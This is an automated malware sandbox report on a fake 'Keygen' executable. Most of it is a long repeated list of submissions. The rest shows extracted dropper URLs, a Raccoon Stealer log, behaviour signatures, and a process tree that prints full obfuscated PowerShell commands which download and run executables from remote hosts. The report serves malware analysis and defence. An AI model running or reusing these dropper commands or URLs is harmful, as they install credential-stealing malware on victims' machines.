Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (63) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:57:44 GMT Bot_ID: 992575D9-3ACE-4400-98F7-F39D82F3369F_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: ELJKIHEZ - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (457 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 52 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (63) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (63) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1272
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\6345.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (63) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Users\Admin\AppData\Local\Temp\6345.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1488
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6345.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1360
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
          • C:\Users\Public\ubl.exe
            "C:\Users\Public\ubl.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2636
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2772
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3032
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3032 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\521642891196658\\* & exit
                  8⤵
                    PID:2784
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3032
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2076
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2808
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2996
              • C:\Users\Public\ubl.exe
                "C:\Users\Public\ubl.exe"
                6⤵
                • Executes dropped EXE
                PID:2948
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6345.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1828
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1604
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1840
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6345.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1904
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1284
            • C:\Users\Public\izw.exe
              "C:\Users\Public\izw.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2532
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2628
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1796
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2808
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2184
